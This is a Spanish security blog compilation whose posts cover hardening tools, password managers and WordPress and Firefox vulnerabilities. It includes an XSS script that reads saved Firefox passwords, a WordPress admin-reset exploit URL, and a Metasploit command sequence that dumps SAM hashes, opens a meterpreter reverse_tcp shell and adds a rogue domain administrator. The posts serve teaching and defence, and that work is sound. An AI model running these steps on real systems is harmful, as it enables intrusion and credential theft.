LapSec (Laptop Securer), es una herramienta destinada a automatizar los cambios más aconsejables para asegurar Windows en un ordenador portátil. Básicamente, agrupa en un solo botón varias tareas. No está destinado a asegurar “por completo” un sistema, sino que pretende facilitar las modificaciones más importantes para un “bastionado” de ordenador portátil, mucho más susceptible de ser perdido o sustraído. Evidentemente, estas medidas también son útiles para un ordenador de sobremesa. También es importante destacar que hay más medidas de seguridad aplicables a un portátil en particular y Windows en general, pero que no han sido implementadas en LapSec por resultar medidas más “genéricas” que se salen del objetivo del programa: activar funcionalidades de seguridad Windows especialmente útiles para portátiles.

Fue desarrollado por Marcin “Icewall” Noga, parte del equipo de Hispasec con el objetivo principal de proteger nuestro portátil para que nadie acceda al sistema operativo, que la información confidencial quede inaccesible y que permita realizar un cifrado seguro, a continuación les dejo la lista de funcionalidades completa:

• Eliminar el cifrado LM de las contraseñas (en Vista y 7 no es necesario).
• Sobrescribir el archivo de memoria paginada (pagefile.sys)
• Ocultar el nombre del usuario que el Sistema Operativo muestra en la pantalla de presentación
• Activar la protección por contraseña del salvapantallas.
• Eliminar la autoejecución de archivos cuando se introducen unidades extraíbles.
• Comprobar la existencia de contraseña del usuario.
• Comprobar la complejidad de las contraseñas.
• Comprueba la activación de la contraseña en la consola de recuperación.
• Deshabilitar el almacenamiento de contraseñas en el navegador Internet Explorer.
• Deshabilitar la hibernación (hibernation.sys).
• Deshabilitar la cuenta de administrador y de invitado del sistema.
• Cifrado de la carpeta Mis Documentos.
• Exportación del certificado de forma sencilla para casos de “desastre”.

Descargar LapSec para Asegurar tu Computador Portatil

Mas Información:
Pagina Oficial de LapSec

También puede interesarte...

• Adeona – Rastrea tu Portatil Robado
• Importar Musica del iPhone o iPod Touch al Disco Duro
• ¿Cómo tomar control de un Dominio en Windows?
• Process Hacker, Mata Procesos en Windows
• Gestionando las impresiones en MAC, Windows y GNU Linux
• Prey – Rastrea tu Computador Robado
• Protege tu Computador Portatil Poniéndole una Alarma
• winAUTOPWN – Ataques automáticos de entornos Windows

El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo “password” y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.

Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:

El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:

<script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script>

Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.

En este caso contar con “clave maestra” en el administrador de contraseñas del Mozilla Firefox no supone una “barrera” para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.

Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.

Actualización:
Un fallo similar fue reportado en el 2006 y supuestamente fue resuelto “VERIFIED FIXED”, pero acabo de probar con la prueba de concepto que publicaron en esa ocasión y sigue siendo vulnerable.

Recomendaciones:

• Escribe “about:config” en la barra del Firefox para desactivar (poner en “false”) la función signon.autofillForms



Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.

• Utilizar el plugin NoScript (si no hay inyección de código, no hay problema)
• No utilizar el Administrador de Contraseñas de Mozilla Firefox (ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador), en vez de el utilizar servicios gratuitos como LastPass (al que por cierto le debo un articulo entero)

Mas Información:
XSS demo for stealing passwords from the Firefox password manager

También puede interesarte...

• Cambia tu clave maestra en LastPass
• ¿Cómo Recuperar una Cuenta de Twitter?
• ¿Cómo Recuperar una Cuenta de Facebook?
• Las peores Contraseñas en Español
• ClaveHotmail.com cometiendo delitos desde el 2007
• Diccionario claves WPA para Realizar Ataques de Fuerza Bruta
• Recupera tu Password de FileZilla
• Diccionarios con Passwords de Sitios Expuestos

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Curso Completo de Metasploit Framework
• winAUTOPWN – Ataques automáticos de entornos Windows
• Así fue el Hacking Day en Medellín – Pentesting con Backtrack
• Cómo funcionan y se crackean las claves en sistemas Windows
• BackTrack 5

Existen muchos programas de este tipo, uno de los mas populares es el Process Explorer de la empresa sysinternals que fue comprada por Microsoft, precisamente por esa compra process explorer ha perdido adeptos (aunque no calidad) y muchos han optado por alternativas totalmente libres como Process Hacker.

A diferencia de otros administradores de tareas, Process Hacker cuenta con su propio drivers para manejar los procesos del sistema, lo que le permite matar procesos incluso si estos están siendo utilizados por el sistema operativo u otras aplicaciones, esta funcionalidad también le permite ver procesos que pueden estar ocultos al “administrador de tareas” de windows, pero no solo podemos ver y eliminar procesos, también podemos realizar las mismas tareas con los servicios del sistema, podemos ver que aplicaciones están haciendo uso de nuestra conexión y con quien se están comunicando.

Sólo funciona en Windows XP o superior de 32 bits y requiere del .NET Framework 2.0. En las versiones de 64 bits su funcionalidad se ve enormemente reducida a causa de que sólo son permitidos drivers firmados con un certificado digital válido emitido por una entidad de confianza, por lo que si deseamos poder cargar el driver de Process Hacker deberemos deshabilitar esta característica que viene por defecto en los sistemas de 64 bits.

Descargar Process Hacker, excelente administrador de Procesos en Microsoft Windows

Para Mas Información:
Pagina Oficial del Process Hacker
Pagina Oficial del Process Explorer

También puede interesarte...

• Actualiza tu software con Secunia Personal Software Inspector
• Herramienta Anti Forense para Windows
• Denegacion de Servicio desde el WordPad
• WUDE 3.0
• Actualiza tu equipo con Windows
• Cómo funcionan y se crackean las claves en sistemas Windows
• DLL Hijacking con Metasploit
• LapSec – Asegura tu Laptop con un Click

Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.
Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:

http://PAGINAAQUI.COM/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:

if ( empty( $key ) )

y remplazarlo por:

if ( empty( $key ) || is_array( $key ) )

Aunque como siempre es recomendable que actualices tu versión a la WordPress a la 2.8.4 aun no sale oficialmente en español, pero puedes utilizar este paquete de idiomas para traducirlo.

También puede interesarte...

• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• XSS que permite postear a atacante registrado en WordPress
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux
• Actualiza a WordPress 2.6.5
• Actualiza a WordPress 2.6.3
• 2 Problemas graves que se solucionan en WordPress 2.6.2

En el curso de Redes en GNU Linux, aprenderemos  a administrar correctamente una red creada con GNU Linux, a montar diferentes servicios de red y otras labores propias de un administrador de red.

Las tematicas tratadas en el curso de redes con GNU/Linux son:

• Introducción
• Usuarios del sistema Unix
• Servidor DCHP
• Servidor DNS
• Entidad Certificadora
• Servidor web Apache
• NFS
• Samba
• Otros servicios
• Copias de seguridad (Backup)
• Servidores de Impresión
• Servidor de terminales
• VNC
• OpenLDAP
• Enrutamiento
• Varios

Descargar Gratis el Curso de Redes con GNU Linux

Mirror I

Los otros cursos de esta serie:

1. Curso de Ubuntu
2. Curso de Redes con GNU Linux
3. Curso de Joomla Gratis
4. Curso de Dibujo Vectorial con OpenOffice Draw

También puede interesarte...

• Cupos disponibles en el SENA
• Curso de Ubuntu
• Cursos Gratis de Diseño Web en el Sena Virtual
• Curso Gratis de Seguridad y Redes en el Sena Virtual
• Video Tutoriales de Wireshark
• Sexto Festival Latinoamericano de Instalación de Software Libre en Medellín – FLISOL 2010
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Comunidad DragonJAR en Open Source University Meetup – OSUM

Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.

El fallo se encuentra en la funcion “self_link() “del  archivo “wp-includes/feed.php” que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con el que se pueden acceder a las cookies del usuario y obtener privilegios de administrador.

Este problema se solucionó en la versión WordPress 2.6.5, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de seguridad.

Jeremias ha publicado un aviso en Bugtraq, en el que se explica en detalla tecnicamente el error e incluye un una prueba de concepto

También puede interesarte...

• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Presentación de conceptos básicos en Seguridad Web
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• Revisa la seguridad de tu sitio web Gratis
• Curso sobre desarrollo seguro de aplicaciones web por Google
• XSS que permite postear a atacante registrado en WordPress
• Denegacion de Servicio en WordPress
• Reseteo Remoto del Password de Admin en WordPress

Hoy les presento PassPub una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.

Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos Myvidoop)

PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.

Generar Passwords con PassPub

Mas Información:
Puedes encontrar mas información en (I II III IV V)

También puede interesarte...

• Maneja tus Contraseñas de Forma Sencilla
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Las peores Contraseñas en Español
• Cambia tu clave maestra en LastPass
• Cupos disponibles en el SENA
• Las Peores 500 Contraseñas de Todos los Tiempos
• ¿Cómo tomar control de un Dominio en Windows?
• Como Recuperar Clave MySQL

Myvidoop es una utilidad que nos permite almacenar todas nuestras contraseñas de servicios web (redes sociales, correos, foros, etc…) en un solo sitio y tras una sola clave (mas adelante veremos las ventajas y desventajas de esto), esta clave única consta de un conjunto de imágenes en una especie de matriz, cuando seleccionemos la combinación correcta de imágenes, se nos rellenara el formulario de acceso del sitio en el que nos encontremos y de esta forma podremos ingresar.

Myvidoop funciona gracias a un plugin que se integra con el navegador el cual almacena las claves de todos los servicios que tengamos asociados con Myvidoo.

Myvidoop también funciona como identificación de OpenID, por lo que podrás usar tu cuenta Myvidoop para loguearte en cualquier pagina que cuente con los servicios de OpenID.

Tenemos a disposición un panel desde el cual podremos agregar las contraseñas para los servicios deseados, agrupar y gestionar contraseñas, ver y activar las ips desde donde vamos a utilizar el servicio y otras funciones.

PRO`s

• Podrás utilizar claves seguras (números, letras, caracteres etc) de la longitud que desees sin preocuparte de olvidar luego esta clave.
• Es portable, solo tienes que instalar el plugin en el navegador que te encuentres, acceder a tu cuenta y hay tendrá tus claves.
• Adiós a los keyloggers, al no digitar tu password bajas considerablemente el riesgo a que te quiten tus claves por este medio (ojo, existen keyloggers que pueden capturar la pantalla o grabar vídeo, a estos si sos vulnerable).
• Es muy fácil de usar.

CONTRAS

• Tendremos que confiar en la ética de Myvidoop, ¿quien nos garantiza que no usen nuestros datos?.
• En caso de ser atacado el portal dejamos al descubierto todos nuestras contraseñas a disposición de un atacante (no estoy diciendo que no cuenten con la seguridad necesaria para prestar un servicio como este, solo digo… en el peor de los casos).

Con esta herramienta es mucho mas fácil seguir consejos de seguridad tan simples como utilizar una clave diferente para cada portal, o usar números, letras y símbolos en nuestras contraseñas.

Para mas información:
Pagina Oficial de Myvidoop
Aquí un vídeo donde explican cono funciona el sistema.

También puede interesarte...

• PassPub, Generador de Contraseñas Seguras
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• ClaveHotmail.com cometiendo delitos desde el 2007
• Las peores Contraseñas para el iPhone, iPod o iPad
• Recupera tu Password de FileZilla
• Cambia tu clave maestra en LastPass
• Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad
• Recupera tu Password de Facebook